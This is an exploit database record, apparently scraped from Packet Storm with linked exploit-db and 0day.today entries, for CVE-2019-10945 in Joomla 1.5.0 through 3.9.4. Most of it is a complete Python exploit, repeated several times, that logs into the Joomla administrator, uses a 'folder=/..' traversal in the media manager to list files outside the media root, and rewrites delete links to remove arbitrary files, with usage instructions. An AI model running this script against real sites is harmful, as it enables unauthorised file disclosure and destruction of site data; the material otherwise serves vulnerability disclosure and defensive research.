ID PACKETSTORM:152515
Type packetstorm
Reporter Haboob Team
Modified 2019-04-16T00:00:00
Description
`# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Date: 2019-March-13
# Exploit Author: Haboob Team
# Web Site: haboob.sa
# Email: research@haboob.sa
# Software Link: https://www.joomla.org/
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# CVE : CVE-2019-10945
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
#
# Usage:
# List files in the specified directory:
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
#
# Delete file in specified directory
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>
import re
import tempfile
import pickle
import os
import hashlib
import urllib
try:
import click
except ImportError:
print("module 'click' doesn't exist, type: pip install click")
exit(0)
try:
import requests
except ImportError:
print("module 'requests' doesn't exist, type: pip install requests")
exit(0)
try:
import lxml.html
except ImportError:
print("module 'lxml' doesn't exist, type: pip install lxml")
exit(0)
mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."
print '''
# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Web Site: Haboob.sa
# Email: research@haboob.sa
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
_ _ ____ ____ ____ ____
| | | | /\ | _ \ / __ \ / __ \| _ \
| |__| | / \ | |_) | | | | | | | |_) |
| __ | / /\ \ | _ <| | | | | | | _ <
| | | |/ ____ \| |_) | |__| | |__| | |_) |
|_| |_/_/ \_\____/ \____/ \____/|____/
'''
class URL(click.ParamType):
name = 'url'
regex = re.compile(
r'^(?:http)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
def convert(self, value, param, ctx):
if not isinstance(value, tuple):
if re.match(self.regex, value) is None:
self.fail('invalid URL (%s)' % value, param, ctx)
return value
def getForm(url, query, cookie=''):
r = requests.get(url, cookies=cookie, timeout=5)
if r.status_code != 200:
print("invalid URL: 404 NOT FOUND!!")
exit(0)
page = r.text.encode('utf-8')
html = lxml.html.fromstring(page)
return html.xpath(query), r.cookies
def login(url, username, password):
csrf, cookie = getForm(url, '//input/@name')
postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
'return': 'aW5kZXgucGhw', csrf[-1]: 1}
res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
if res.status_code == 200:
html = lxml.html.fromstring(res.text)
msg = html.xpath("//div[@class='alert-message']/text()[1]")
print msg
exit()
else:
get_cookies(res.cookies.get_dict(), url, username, password)
def save_cookies(requests_cookiejar, filename):
with open(filename, 'wb') as f:
pickle.dump(requests_cookiejar, f)
def load_cookies(filename):
with open(filename, 'rb') as f:
return pickle.load(f)
def cookies_file_name(url, username, password):
result = hashlib.md5(str(url) + str(username) + str(password))
_dir = tempfile.gettempdir()
return _dir + "/" + result.hexdigest() + ".Jcookie"
def get_cookies(req_cookie, url, username, password):
cookie_file = cookies_file_name(url, username, password)
if os.path.isfile(cookie_file):
return load_cookies(cookie_file)
else:
save_cookies(req_cookie, cookie_file)
return req_cookie
def traversal(url, username, password, dir=None):
cookie = get_cookies('', url, username, password)
url = url + mediaList + dir
files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
for file in files:
print file
pass
def removeFile(baseurl, username, password, dir='', file=''):
cookie = get_cookies('', baseurl, username, password)
url = baseurl + mediaList + dir
link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
if link:
link = urllib.unquote(link[0].encode("utf8"))
link = link.split('folder=')[0]
link = link.replace("folder.delete", "file.delete")
link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
if len(msg) == 0:
print "ERROR : File does not exist"
else:
print msg
else:
print "ERROR:404 NOT FOUND!!"
@click.group(invoke_without_command=True)
@click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
@click.option('--username', type=str, help="Joomla Manager username", required=True)
@click.option('--password', type=str, help="Joomla Manager password", required=True)
@click.option('--dir', type=str, help="listing directory")
@click.option('--rm', type=str, help="delete file")
@click.pass_context
def cli(ctx, url, username, password, dir, rm):
url = url+"/"
cookie_file = cookies_file_name(url, username, password)
if not os.path.isfile(cookie_file):
login(url, username, password)
if dir is not None:
dir = dir.lstrip('/')
dir = dir.rstrip('/')
dir = "/" + dir
if dir == "/" or dir == "../" or dir == "/.":
dir = ''
else:
dir = ''
print dir
if rm is not None:
removeFile(url, username, password, dir, rm)
else:
traversal(url, username, password, dir)
cli()
`
{"id": "PACKETSTORM:152515", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal", "description": "", "published": "2019-04-16T00:00:00", "modified": "2019-04-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html", "reporter": "Haboob Team", "references": [], "cvelist": ["CVE-2019-10945"], "lastseen": "2019-04-17T03:46:31", "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-10945"]}, {"type": "joomla", "idList": ["JOOMLA-777"]}, {"type": "exploitdb", "idList": ["EDB-ID:46710"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A803156FD0F8DFEDED5A83B198A1673B"]}, {"type": "zdt", "idList": ["1337DAY-ID-32548"]}, {"type": "nessus", "idList": ["JOOMLA_395.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113369"]}], "modified": "2019-04-17T03:46:31", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2019-04-17T03:46:31", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/152515/joomla394-traversaldelete.txt", "sourceData": "`# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion \n# Date: 2019-March-13 \n# Exploit Author: Haboob Team \n# Web Site: haboob.sa \n# Email: research@haboob.sa \n# Software Link: https://www.joomla.org/ \n# Versions: Joomla 1.5.0 through Joomla 3.9.4 \n# CVE : CVE-2019-10945 \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n# \n# Usage: \n# List files in the specified directory: \n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name> \n# \n# Delete file in specified directory \n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name> \n \n \nimport re \nimport tempfile \nimport pickle \nimport os \nimport hashlib \nimport urllib \n \ntry: \nimport click \nexcept ImportError: \nprint(\"module 'click' doesn't exist, type: pip install click\") \nexit(0) \n \ntry: \nimport requests \nexcept ImportError: \nprint(\"module 'requests' doesn't exist, type: pip install requests\") \nexit(0) \ntry: \nimport lxml.html \nexcept ImportError: \nprint(\"module 'lxml' doesn't exist, type: pip install lxml\") \nexit(0) \n \nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\" \n \nprint ''' \n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion \n# Web Site: Haboob.sa \n# Email: research@haboob.sa \n# Versions: Joomla 1.5.0 through Joomla 3.9.4 \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n_ _ ____ ____ ____ ____ \n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \n| |__| | / \\ | |_) | | | | | | | |_) | \n| __ | / /\\ \\ | _ <| | | | | | | _ < \n| | | |/ ____ \\| |_) | |__| | |__| | |_) | \n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \n \n''' \nclass URL(click.ParamType): \nname = 'url' \nregex = re.compile( \nr'^(?:http)s?://' # http:// or https:// \nr'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain... \nr'localhost|' # localhost... \nr'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip \nr'(?::\\d+)?' # optional port \nr'(?:/?|[/?]\\S+)$', re.IGNORECASE) \n \ndef convert(self, value, param, ctx): \nif not isinstance(value, tuple): \nif re.match(self.regex, value) is None: \nself.fail('invalid URL (%s)' % value, param, ctx) \nreturn value \n \n \ndef getForm(url, query, cookie=''): \nr = requests.get(url, cookies=cookie, timeout=5) \nif r.status_code != 200: \nprint(\"invalid URL: 404 NOT FOUND!!\") \nexit(0) \npage = r.text.encode('utf-8') \nhtml = lxml.html.fromstring(page) \nreturn html.xpath(query), r.cookies \n \n \ndef login(url, username, password): \ncsrf, cookie = getForm(url, '//input/@name') \npostData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login', \n'return': 'aW5kZXgucGhw', csrf[-1]: 1} \n \nres = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False) \nif res.status_code == 200: \nhtml = lxml.html.fromstring(res.text) \nmsg = html.xpath(\"//div[@class='alert-message']/text()[1]\") \nprint msg \nexit() \nelse: \nget_cookies(res.cookies.get_dict(), url, username, password) \n \n \ndef save_cookies(requests_cookiejar, filename): \nwith open(filename, 'wb') as f: \npickle.dump(requests_cookiejar, f) \n \n \ndef load_cookies(filename): \nwith open(filename, 'rb') as f: \nreturn pickle.load(f) \n \n \ndef cookies_file_name(url, username, password): \nresult = hashlib.md5(str(url) + str(username) + str(password)) \n_dir = tempfile.gettempdir() \nreturn _dir + \"/\" + result.hexdigest() + \".Jcookie\" \n \n \ndef get_cookies(req_cookie, url, username, password): \ncookie_file = cookies_file_name(url, username, password) \nif os.path.isfile(cookie_file): \nreturn load_cookies(cookie_file) \nelse: \nsave_cookies(req_cookie, cookie_file) \nreturn req_cookie \n \n \ndef traversal(url, username, password, dir=None): \ncookie = get_cookies('', url, username, password) \nurl = url + mediaList + dir \nfiles, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie) \nfor file in files: \nprint file \npass \n \n \ndef removeFile(baseurl, username, password, dir='', file=''): \ncookie = get_cookies('', baseurl, username, password) \nurl = baseurl + mediaList + dir \nlink, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie) \nif link: \nlink = urllib.unquote(link[0].encode(\"utf8\")) \nlink = link.split('folder=')[0] \nlink = link.replace(\"folder.delete\", \"file.delete\") \nlink = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file \nmsg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie) \nif len(msg) == 0: \nprint \"ERROR : File does not exist\" \nelse: \nprint msg \nelse: \nprint \"ERROR:404 NOT FOUND!!\" \n \n \n@click.group(invoke_without_command=True) \n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True) \n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True) \n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True) \n@click.option('--dir', type=str, help=\"listing directory\") \n@click.option('--rm', type=str, help=\"delete file\") \n@click.pass_context \ndef cli(ctx, url, username, password, dir, rm): \nurl = url+\"/\" \ncookie_file = cookies_file_name(url, username, password) \nif not os.path.isfile(cookie_file): \nlogin(url, username, password) \nif dir is not None: \ndir = dir.lstrip('/') \ndir = dir.rstrip('/') \ndir = \"/\" + dir \nif dir == \"/\" or dir == \"../\" or dir == \"/.\": \ndir = '' \nelse: \ndir = '' \nprint dir \nif rm is not None: \nremoveFile(url, username, password, dir, rm) \nelse: \ntraversal(url, username, password, dir) \n \n \ncli() \n`\n"}
{"cve": [{"lastseen": "2021-02-02T07:12:47", "description": "An issue was discovered in Joomla! before 3.9.5. The Media Manager component does not properly sanitize the folder parameter, allowing attackers to act outside the media manager root directory.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-10T19:29:00", "title": "CVE-2019-10945", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10945"], "modified": "2019-04-17T17:18:00", "cpe": ["cpe:/a:joomla:joomla\\!:3.9.4"], "id": "CVE-2019-10945", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10945", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:3.9.4:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-04-17T21:41:20", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-04-16T00:00:00", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], "modified": "2019-04-16T00:00:00", "id": "1337DAY-ID-32548", "href": "https://0day.today/exploit/description/32548", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Exploit Author: Haboob Team\r\n# Web Site: haboob.sa\r\n# Email: [email\u00a0protected]\r\n# Software Link: https://www.joomla.org/\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# CVE : CVE-2019-10945\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\r\n#\r\n# Usage:\r\n# List files in the specified directory:\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\r\n#\r\n# Delete file in specified directory\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\r\n\r\n\r\nimport re\r\nimport tempfile\r\nimport pickle\r\nimport os\r\nimport hashlib\r\nimport urllib\r\n\r\ntry:\r\n import click\r\nexcept ImportError:\r\n print(\"module 'click' doesn't exist, type: pip install click\")\r\n exit(0)\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"module 'requests' doesn't exist, type: pip install requests\")\r\n exit(0)\r\ntry:\r\n import lxml.html\r\nexcept ImportError:\r\n print(\"module 'lxml' doesn't exist, type: pip install lxml\")\r\n exit(0)\r\n\r\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\r\n\r\nprint ''' \r\n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Web Site: Haboob.sa\r\n# Email: [email\u00a0protected]\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \r\n _ _ ____ ____ ____ ____ \r\n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \r\n| |__| | / \\ | |_) | | | | | | | |_) |\r\n| __ | / /\\ \\ | _ <| | | | | | | _ < \r\n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\r\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \r\n \r\n'''\r\nclass URL(click.ParamType):\r\n name = 'url'\r\n regex = re.compile(\r\n r'^(?:http)s?://' # http:// or https://\r\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\r\n r'localhost|' # localhost...\r\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\r\n r'(?::\\d+)?' # optional port\r\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\r\n\r\n def convert(self, value, param, ctx):\r\n if not isinstance(value, tuple):\r\n if re.match(self.regex, value) is None:\r\n self.fail('invalid URL (%s)' % value, param, ctx)\r\n return value\r\n\r\n\r\ndef getForm(url, query, cookie=''):\r\n r = requests.get(url, cookies=cookie, timeout=5)\r\n if r.status_code != 200:\r\n print(\"invalid URL: 404 NOT FOUND!!\")\r\n exit(0)\r\n page = r.text.encode('utf-8')\r\n html = lxml.html.fromstring(page)\r\n return html.xpath(query), r.cookies\r\n\r\n\r\ndef login(url, username, password):\r\n csrf, cookie = getForm(url, '//input/@name')\r\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\r\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\r\n\r\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\r\n if res.status_code == 200:\r\n html = lxml.html.fromstring(res.text)\r\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\r\n print msg\r\n exit()\r\n else:\r\n get_cookies(res.cookies.get_dict(), url, username, password)\r\n\r\n\r\ndef save_cookies(requests_cookiejar, filename):\r\n with open(filename, 'wb') as f:\r\n pickle.dump(requests_cookiejar, f)\r\n\r\n\r\ndef load_cookies(filename):\r\n with open(filename, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef cookies_file_name(url, username, password):\r\n result = hashlib.md5(str(url) + str(username) + str(password))\r\n _dir = tempfile.gettempdir()\r\n return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\r\n\r\n\r\ndef get_cookies(req_cookie, url, username, password):\r\n cookie_file = cookies_file_name(url, username, password)\r\n if os.path.isfile(cookie_file):\r\n return load_cookies(cookie_file)\r\n else:\r\n save_cookies(req_cookie, cookie_file)\r\n return req_cookie\r\n\r\n\r\ndef traversal(url, username, password, dir=None):\r\n cookie = get_cookies('', url, username, password)\r\n url = url + mediaList + dir\r\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\r\n for file in files:\r\n print file\r\n pass\r\n\r\n\r\ndef removeFile(baseurl, username, password, dir='', file=''):\r\n cookie = get_cookies('', baseurl, username, password)\r\n url = baseurl + mediaList + dir\r\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\r\n if link:\r\n link = urllib.unquote(link[0].encode(\"utf8\"))\r\n link = link.split('folder=')[0]\r\n link = link.replace(\"folder.delete\", \"file.delete\")\r\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\r\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\r\n if len(msg) == 0:\r\n print \"ERROR : File does not exist\"\r\n else:\r\n print msg\r\n else:\r\n print \"ERROR:404 NOT FOUND!!\"\r\n\r\n\r\n@click.group(invoke_without_command=True)\r\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\r\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\r\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\r\n@click.option('--dir', type=str, help=\"listing directory\")\r\n@click.option('--rm', type=str, help=\"delete file\")\r\n@click.pass_context\r\ndef cli(ctx, url, username, password, dir, rm):\r\n url = url+\"/\"\r\n cookie_file = cookies_file_name(url, username, password)\r\n if not os.path.isfile(cookie_file):\r\n login(url, username, password)\r\n if dir is not None:\r\n dir = dir.lstrip('/')\r\n dir = dir.rstrip('/')\r\n dir = \"/\" + dir\r\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\r\n dir = ''\r\n else:\r\n dir = ''\r\n print dir\r\n if rm is not None:\r\n removeFile(url, username, password, dir, rm)\r\n else:\r\n traversal(url, username, password, dir)\r\n\r\n\r\ncli()\n\n# 0day.today [2019-04-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32548"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:22", "description": "\nJoomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion", "edition": 1, "published": "2019-04-16T00:00:00", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], "modified": "2019-04-16T00:00:00", "id": "EXPLOITPACK:A803156FD0F8DFEDED5A83B198A1673B", "href": "", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\n# Date: 2019-March-13\n# Exploit Author: Haboob Team\n# Web Site: haboob.sa\n# Email: research@haboob.sa\n# Software Link: https://www.joomla.org/\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\n# CVE : CVE-2019-10945\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\n#\n# Usage:\n# List files in the specified directory:\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\n#\n# Delete file in specified directory\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\n\n\nimport re\nimport tempfile\nimport pickle\nimport os\nimport hashlib\nimport urllib\n\ntry:\n import click\nexcept ImportError:\n print(\"module 'click' doesn't exist, type: pip install click\")\n exit(0)\n\ntry:\n import requests\nexcept ImportError:\n print(\"module 'requests' doesn't exist, type: pip install requests\")\n exit(0)\ntry:\n import lxml.html\nexcept ImportError:\n print(\"module 'lxml' doesn't exist, type: pip install lxml\")\n exit(0)\n\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\n\nprint ''' \n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\n# Web Site: Haboob.sa\n# Email: research@haboob.sa\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n _ _ ____ ____ ____ ____ \n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \n| |__| | / \\ | |_) | | | | | | | |_) |\n| __ | / /\\ \\ | _ <| | | | | | | _ < \n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \n \n'''\nclass URL(click.ParamType):\n name = 'url'\n regex = re.compile(\n r'^(?:http)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n def convert(self, value, param, ctx):\n if not isinstance(value, tuple):\n if re.match(self.regex, value) is None:\n self.fail('invalid URL (%s)' % value, param, ctx)\n return value\n\n\ndef getForm(url, query, cookie=''):\n r = requests.get(url, cookies=cookie, timeout=5)\n if r.status_code != 200:\n print(\"invalid URL: 404 NOT FOUND!!\")\n exit(0)\n page = r.text.encode('utf-8')\n html = lxml.html.fromstring(page)\n return html.xpath(query), r.cookies\n\n\ndef login(url, username, password):\n csrf, cookie = getForm(url, '//input/@name')\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\n\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\n if res.status_code == 200:\n html = lxml.html.fromstring(res.text)\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\n print msg\n exit()\n else:\n get_cookies(res.cookies.get_dict(), url, username, password)\n\n\ndef save_cookies(requests_cookiejar, filename):\n with open(filename, 'wb') as f:\n pickle.dump(requests_cookiejar, f)\n\n\ndef load_cookies(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\n\ndef cookies_file_name(url, username, password):\n result = hashlib.md5(str(url) + str(username) + str(password))\n _dir = tempfile.gettempdir()\n return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\n\n\ndef get_cookies(req_cookie, url, username, password):\n cookie_file = cookies_file_name(url, username, password)\n if os.path.isfile(cookie_file):\n return load_cookies(cookie_file)\n else:\n save_cookies(req_cookie, cookie_file)\n return req_cookie\n\n\ndef traversal(url, username, password, dir=None):\n cookie = get_cookies('', url, username, password)\n url = url + mediaList + dir\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\n for file in files:\n print file\n pass\n\n\ndef removeFile(baseurl, username, password, dir='', file=''):\n cookie = get_cookies('', baseurl, username, password)\n url = baseurl + mediaList + dir\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\n if link:\n link = urllib.unquote(link[0].encode(\"utf8\"))\n link = link.split('folder=')[0]\n link = link.replace(\"folder.delete\", \"file.delete\")\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\n if len(msg) == 0:\n print \"ERROR : File does not exist\"\n else:\n print msg\n else:\n print \"ERROR:404 NOT FOUND!!\"\n\n\n@click.group(invoke_without_command=True)\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\n@click.option('--dir', type=str, help=\"listing directory\")\n@click.option('--rm', type=str, help=\"delete file\")\n@click.pass_context\ndef cli(ctx, url, username, password, dir, rm):\n url = url+\"/\"\n cookie_file = cookies_file_name(url, username, password)\n if not os.path.isfile(cookie_file):\n login(url, username, password)\n if dir is not None:\n dir = dir.lstrip('/')\n dir = dir.rstrip('/')\n dir = \"/\" + dir\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\n dir = ''\n else:\n dir = ''\n print dir\n if rm is not None:\n removeFile(url, username, password, dir, rm)\n else:\n traversal(url, username, password, dir)\n\n\ncli()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "joomla": [{"lastseen": "2020-12-24T13:21:34", "bulletinFamily": "software", "cvelist": ["CVE-2019-10945"], "description": "The Media Manager component does not properly sanitise the folder parameter, allowing attackers to act outside the media manager root directory.\n", "edition": 3, "modified": "2019-04-08T00:00:00", "published": "2019-04-08T00:00:00", "id": "JOOMLA-777", "href": "https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html?highlight=WyJleHBsb2l0Il0=", "title": "[20190401] - Core - Directory Traversal in com_media", "type": "joomla", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-04-16T15:59:49", "description": "", "published": "2019-04-16T00:00:00", "type": "exploitdb", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], "modified": "2019-04-16T00:00:00", "id": "EDB-ID:46710", "href": "https://www.exploit-db.com/exploits/46710", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Date: 2019-March-13\r\n# Exploit Author: Haboob Team\r\n# Web Site: haboob.sa\r\n# Email: research@haboob.sa\r\n# Software Link: https://www.joomla.org/\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# CVE : CVE-2019-10945\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\r\n#\r\n# Usage:\r\n# List files in the specified directory:\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\r\n#\r\n# Delete file in specified directory\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\r\n\r\n\r\nimport re\r\nimport tempfile\r\nimport pickle\r\nimport os\r\nimport hashlib\r\nimport urllib\r\n\r\ntry:\r\n import click\r\nexcept ImportError:\r\n print(\"module 'click' doesn't exist, type: pip install click\")\r\n exit(0)\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"module 'requests' doesn't exist, type: pip install requests\")\r\n exit(0)\r\ntry:\r\n import lxml.html\r\nexcept ImportError:\r\n print(\"module 'lxml' doesn't exist, type: pip install 